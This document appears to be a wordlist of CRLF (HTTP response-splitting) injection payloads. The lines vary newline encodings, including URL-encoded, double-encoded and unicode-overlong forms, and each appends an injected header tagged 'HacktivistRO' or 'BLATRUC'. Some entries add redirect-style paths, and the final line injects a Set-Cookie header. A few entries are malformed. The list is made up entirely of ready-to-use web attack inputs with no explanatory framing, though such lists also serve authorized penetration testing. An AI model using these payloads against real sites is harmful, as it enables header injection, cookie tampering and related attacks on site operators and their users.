crlf%0AHeader-Test:HacktivistRO
crlf%0A%20Header-Test:HacktivistRO
crlf%20%0AHeader-Test:HacktivistRO
crlf%23%OAHeader-Test:HacktivistRO
crlf%E5%98%8A%E5%98%8DHeader-Test:HacktivistRO
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:HacktivistRO
crlf%3F%0AHeader-Test:HacktivistRO
%0DHeader-Test:HacktivistRO
%0D%20Header-Test:HacktivistRO
%20%0DHeader-Test:HacktivistRO
%23%0DHeader-Test:HacktivistRO
%23%0AHeader-Test:HacktivistRO
%E5%98%8A%E5%98%8D%0DHeader-Test:HacktivistRO
%3F%0DHeader-Test:HacktivistRO
crlf%0DHeader-Test:HacktivistRO
crlf%0D%20Header-Test:HacktivistRO
crlf%20%0DHeader-Test:HacktivistRO
crlf%23%0DHeader-Test:HacktivistRO
crlf%23%0AHeader-Test:HacktivistRO
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:HacktivistRO
crlf%3F%0DHeader-Test:HacktivistRO
%0D%0AHeader-Test:HacktivistRO
%0D%0A%20Header-Test:HacktivistRO
%20%0D%0AHeader-Test:HacktivistRO
%23%0D%0AHeader-Test:HacktivistRO
\r\nHeader-Test:HacktivistRO
 \r\n Header-Test:HacktivistRO
\r\n Header-Test:HacktivistRO
%5cr%5cnHeader-Test:HacktivistRO
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:HacktivistRO
%3F%0D%0AHeader-Test:HacktivistRO
crlf%0D%0AHeader-Test:HacktivistRO
crlf%0D%0A%20Header-Test:HacktivistRO
crlf%20%0D%0AHeader-Test:HacktivistRO
crlf%23%0D%0AHeader-Test:HacktivistRO
crlf\r\nHeader-Test:HacktivistRO
crlf%5cr%5cnHeader-Test:HacktivistRO
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:HacktivistRO
crlf%3F%0D%0AHeader-Test:HacktivistRO
%0D%0A%09Header-Test:HacktivistRO
crlf%0D%0A%09Header-Test:HacktivistRO
%250AHeader-Test:HacktivistRO
%25250AHeader-Test:HacktivistRO
%%0A0AHeader-Test:HacktivistRO
%25%30AHeader-Test:HacktivistRO
%25%30%61Header-Test:HacktivistRO
%u000AHeader-Test:HacktivistRO
%u000AX-Header-Test:HacktivistRO
//www.rohanwebsite.in/%2F%2E%2E%0D%0AHeader-Test:HacktivistRO
/www.rohanwebsite.in/%2E%2E%2F%0D%0AHeader-Test:HacktivistRO
/rohanwebsite.in/%2F..%0D%0AHeader-Test:HacktivistRO
%0AHeader-Test:BLATRUC
%0A%20Header-Test:BLATRUC
%20%0AHeader-Test:BLATRUC
%23%OAHeader-Test:BLATRUC
%E5%98%8A%E5%98%8DHeader-Test:BLATRUC
%E5%98%8A%E5%98%8D%0AHeader-Test:BLATRUC
%3F%0AHeader-Test:BLATRUC
crlf%0AHeader-Test:BLATRUC
crlf%0A%20Header-Test:BLATRUC
crlf%20%0AHeader-Test:BLATRUC
crlf%23%OAHeader-Test:BLATRUC
crlf%E5%98%8A%E5%98%8DHeader-Test:BLATRUC
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:BLATRUC
crlf%3F%0AHeader-Test:BLATRUC
%0DHeader-Test:BLATRUC
%0D%20Header-Test:BLATRUC
%20%0DHeader-Test:BLATRUC
%23%0DHeader-Test:BLATRUC
%23%0AHeader-Test:BLATRUC
%E5%98%8A%E5%98%8D%0DHeader-Test:BLATRUC
%3F%0DHeader-Test:BLATRUC
crlf%0DHeader-Test:BLATRUC
crlf%0D%20Header-Test:BLATRUC
crlf%20%0DHeader-Test:BLATRUC
crlf%23%0DHeader-Test:BLATRUC
crlf%23%0AHeader-Test:BLATRUC
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:BLATRUC
crlf%3F%0DHeader-Test:BLATRUC
%0D%0AHeader-Test:BLATRUC
%0D%0A%20Header-Test:BLATRUC
%20%0D%0AHeader-Test:BLATRUC
%23%0D%0AHeader-Test:BLATRUC
\r\nHeader-Test:BLATRUC
 \r\n Header-Test:BLATRUC
\r\n Header-Test:BLATRUC
%5cr%5cnHeader-Test:BLATRUC
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:BLATRUC
%3F%0D%0AHeader-Test:BLATRUC
crlf%0D%0AHeader-Test:BLATRUC
crlf%0D%0A%20Header-Test:BLATRUC
crlf%20%0D%0AHeader-Test:BLATRUC
crlf%23%0D%0AHeader-Test:BLATRUC
crlf\r\nHeader-Test:BLATRUC
crlf%5cr%5cnHeader-Test:BLATRUC
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:BLATRUC
crlf%3F%0D%0AHeader-Test:BLATRUC
%0D%0A%09Header-Test:BLATRUC
crlf%0D%0A%09Header-Test:BLATRUC
%250AHeader-Test:BLATRUC
%25250AHeader-Test:BLATRUC
%%0A0AHeader-Test:BLATRUC
%25%30AHeader-Test:BLATRUC
%25%30%61Header-Test:BLATRUC
%u000AHeader-Test:BLATRUC
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:BLATRUC
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:BLATRUC
/google.com/%2F..%0D%0AHeader-Test:BLATRUC
%0d%0a%20Set-Cookie: x=x%0aX:INJECTX###General Vectors###